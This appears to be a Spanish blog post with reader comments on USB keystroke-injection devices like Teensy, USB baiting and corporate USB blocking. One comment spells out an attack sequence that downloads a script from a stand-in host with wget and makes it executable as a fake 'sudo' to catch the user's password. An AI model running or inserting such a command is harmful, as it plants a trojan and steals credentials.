Por más que el bueno de Mitnick insista, la ingenuidad de los usuarios continúa siendo el mayor enemigo de la seguridad.
Por ejemplo. Un empleado se encuentra un pincho USB abandonado junto a su ordenador de trabajo. ¿Qué porcentaje de empleados creéis que enchufaría de inmediato el pincho para ver qué tiene dentro? ¿Y si el pincho no es lo que parece?
Al menos desde que Teensy anda por el mundo, cualquier atacante puede programar este interesante dispositivo mediante un sencillo lenguaje de script (o bien utilizar un payload prêt-a-porter) para que, una vez conectado al ordenador objetivo, ejecute cualquier combinación de teclas con el fin de correr cualquier comando en el ordenador de la víctima, ya utilice éste Windows, Linux o MacOS...
El camuflaje del dispositivo puede ser de lo más variopinto: desde algo clásico a un "inocente" patito.
Como que me quedé votado XD
wifixcort7 Diciembre 2011 - 6:15am
mmmm... creo que me quedé votado unos cuantos kilómetros atras, no se Mac OS, la verdad no me interesa wintendo, pero Linux? aca es donde me pregunto en una maquina con linux para que esta realice cualquier modificación al sistema, si se corre un script linux pide siempre permiso, te manda un mensaje para meter la contraseña, a no ser que se desactive y no lo sepa??
no es un script de por si
deabru16 Diciembre 2011 - 11:14am
En hak5 mostraron uno que, al conectarse al pc, básicamente actuaba como un teclado. Tiene unas pulsaciones de teclas predefinidas. Podría lanzar:
alt-f2
w g e t h t t .... (wget http://archivo.chungo.de/cojones.sh -O ~/bin/sudo)
c h m o d + x .... (chmod +x ~/bin/sudo)
Y a esperar que tenga que hacer algún sudo.
Lo que se quiera robar o
minick7 Diciembre 2011 - 10:14am
Lo que se quiera robar o hacer no tiene porqué necesitar permisos de administrador, con un usuario normal no se puede tomar el control de toda la máquina pero sí de gran parte.
Mucho nivel
guimoma6 Diciembre 2011 - 10:13pm
Para realizar esta intrusión es necesario llegar físicamente al ordenador que queremos atacar. Esto supone un interes muy alto en el ordenador atacado, muy lejos del interés generico que solemos provocar los usuarios normales. Y si tú eres un personaje lo suficientemente interesante para que alguien se acerque hasta tu ordenador para colocarte una memoria USB por allí (¿para qué esperar a que la pinche otro, porqué no el mismo atacante?), seguro que tienes unas medidas de seguridad muy superiores a la media de los curritos que tenemos un PC para trabajar.
Hace unos años hicieron una
minick7 Diciembre 2011 - 10:12am
Hace unos años hicieron una prueba dejando usb tirados en un garaje, cuando las personas iban por su coche lo encontraban "casualmente" y como te imaginas, ya se ocupaban ellos de llevarte el usb a su equipo para enchufarlo ellos mismos.
Ni de mi padre...
Texpaok6 Diciembre 2011 - 8:52pm
...me fío yo. Por mucho que tenga una apariencia inofensiva, un USB es siempre un USB.
Pero ya no vale con deshabilitar los USB: ¡es la era de los "teléfonos inteligentes"!
Basta con colocar un iphone lo suficientemente cerca de un teclado para que actúe de keylogger detectando las vibraciones emitidas... Esto, que parece ciencia-ficción, ya es posible...
Teclado "falso"
Algarrobo6 Diciembre 2011 - 4:50pm
Entonces, si he entendido bien, el dispositivo USB en lugar de ser una memoria es un emulador de teclado ¿no? Envía una serie de comandos como si fueran escritos por el usuario ya que el sistema lo reconoce automáticamente como un teclado.
Si es ese el caso, el problema de seguridad estaría en que el sistema acepte ordenes automáticamente de un dispositivo USB que conecta de pronto (al considerarlo un teclado legítimo) ¿no? Es que me recuerda mucho al autorun de los CDROMs en Windows, no veo normal que el sistema ejecute comandos "externos" de forma automática sin preguntar. ¿Cómo podría evitarse este fallo de seguridad sin desactivar los puertos USB?
Seguridad??
Johns6 Diciembre 2011 - 12:27pm
Toda empresa que, a dia de hoy, no bloquee por politicas los USB no merece mas que que nos riamos de ella.
Lo siento pero es algo de cajón, como sysadmin es una de las primeras cosas que hay que bloquear aunque molestes al personal... hasta a los jefazos.
Donde trabajo solo hay dos ordenadores que tienen los USB desbloqueados, los dos de informática.
Pero bueno, ya sabemos que en España "molestar" a los usuarios por seguridad ya sea bloqueando USBs o ciertas páginas web (periodicos, correos, etc..) significa ser el enemigo de todos, y los jefes evidentemente no quieren estar "bloqueados" (o seguros).
Uff, pues te vas a hartar a reirte
Borde7 Diciembre 2011 - 5:24pm
Porque son muchas las que al final han abierto los usb. Al principio al gerente, luego a otros directivos, luego que si el personal a los directivos. Total que quedaban dos usuarios capados. ¡Que gran injusticia señor informático!
Abierto a todos.
No me extraña que terminen
anv9 Diciembre 2011 - 1:15pm
No me extraña que terminen por liberar los puertos. Sobre todo tomando en cuenta que los virus siguen entrando igual, y que para colmo si un programa logra acceso de nivel bastante bajo puede saltarse las "políticoas" que bloquean más a nivel de aplicaciones.
Recuerdo que hace años una empresa se negaba a reemplazar las viejas terminales tontas por PCS+emuladores a pesar de que las terminales eran notablemente más caras que un PC. La explicación es que las terminales no daban problemas porque la gente no pedía que se le instalaran cosas ahí (y obviamente no trataban de instalarlas por su cuenta).
¡Ay si tú supieras!
Calario7 Diciembre 2011 - 1:33pm
Hay algunas que tras haber tenido férreas políticas de seguridad al respecto, han optado por abrir alegremente los puertos USB ¿el motivo? Buena pregunta, pero no te cuento la respuesta porque puede ser demasiado fuerte para una persona cabal.